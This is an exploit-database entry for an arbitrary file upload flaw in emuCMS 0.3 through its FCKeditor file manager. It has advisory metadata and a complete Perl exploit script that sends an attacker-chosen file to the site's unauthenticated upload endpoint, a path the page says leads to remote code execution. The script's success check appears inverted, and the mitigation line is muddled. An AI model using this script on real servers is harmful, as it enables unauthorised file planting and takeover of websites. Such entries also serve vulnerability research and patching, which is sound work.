emuCMS 0.3 (fckeditor) Arbitrary File Upload xpl

vendor:

emuCMS 0.3

by:

Stack

9.3

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: emuCMS 0.3

Affected Version From: 0.3

Affected Version To: 0.3

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

emuCMS 0.3 (fckeditor) Arbitrary File Upload xpl

emuCMS 0.3 is vulnerable to an arbitrary file upload vulnerability. An attacker can exploit this vulnerability to upload malicious files to the server, which can lead to remote code execution. This exploit uses the FCKeditor file manager to upload a malicious file to the server.

Mitigation:

Upgrade to the latest version of emuCMS 0.3

Source

Exploit-DB raw data:

#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+emuCMS 0.3 (fckeditor) Arbitrary File Upload  xpl  +
+                                                   +
+                   By: Stack                       +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
# t0pP8uZz  
INTRO
print "Enter URL(ie: http://site.com): ";
    chomp(my $url=<STDIN>);
   
print "Enter File Path(path to local file to upload): ";
    chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php',
                      Content_Type => 'form-data',
                      Content      => [ NewFile => $file ] );
if($re->is_success) {
    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
    else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;

# milw0rm.com [2008-06-23]